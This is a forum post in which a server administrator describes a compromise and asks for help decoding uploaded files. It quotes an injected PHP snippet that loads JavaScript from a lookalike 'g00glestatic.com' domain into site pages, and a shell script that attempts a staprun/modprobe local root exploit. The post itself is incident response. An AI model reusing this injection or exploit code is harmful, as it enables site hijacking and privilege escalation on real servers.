Didn't ever expect to post this but I guess someone/thing found an exploit to gain access to my server ...
Basically they uploaded a few files to the public_html and ran some bash commands to move those files to the /home/ directory of the users:
A couple of php files also had lines such as:
Those files can be easily cleaned but there were four .session_121432 type files uploaded that contain either bash scripts or machine code, my question is can anyone decode these two attached files?
The one of those files that's not in machine language is:
Would be nice to see what they ran!
The servers getting nuked and rebuilt later today so this will be all be gone soon.
Also any ideas on how they gained access to two users public_html folders? Neither accounts had anything like wordpress or vbulletin, mostly custom coded code, possibly a brute force?
Basically they uploaded a few files to the public_html and ran some bash commands to move those files to the /home/ directory of the users:
A couple of php files also had lines such as:
PHP:
#9c282e#
if(!$srvc_counter) {
echo "<script type=\"text/javascript\" src=\"http://g00glestatic.com/s.js\"></script>";
$srvc_counter = true;}
#/9c282e#
Those files can be easily cleaned but there were four .session_121432 type files uploaded that contain either bash scripts or machine code, my question is can anyone decode these two attached files?
The one of those files that's not in machine language is:
PHP:
#!/bin/sh
export PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/bin;
export LC_ALL=en_US.UTF-8 LC_COLLATE=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 LANG=en_US.UTF-8 LANGUAGE=en_US.UTF-8
export TERM=linux
echo -n "-> checking staprun: ";
if which staprun 2>&1 | grep -q "no $1";
then
flag=1
elif [ -z "`which $1 2>&1`" ];
then
flag=1;
fi
if [ "$flag" = "1" ];
then
echo "no staprun, exiting"; exit;
else
echo "found";
echo "-> trying to exploit... ";
printf "install uprobes /bin/sh" > ololo.conf;
MODPROBE_OPTIONS="-C ololo.conf" staprun -u ololo
rm -f ololo.conf
fi
Would be nice to see what they ran!
The servers getting nuked and rebuilt later today so this will be all be gone soon.
Also any ideas on how they gained access to two users public_html folders? Neither accounts had anything like wordpress or vbulletin, mostly custom coded code, possibly a brute force?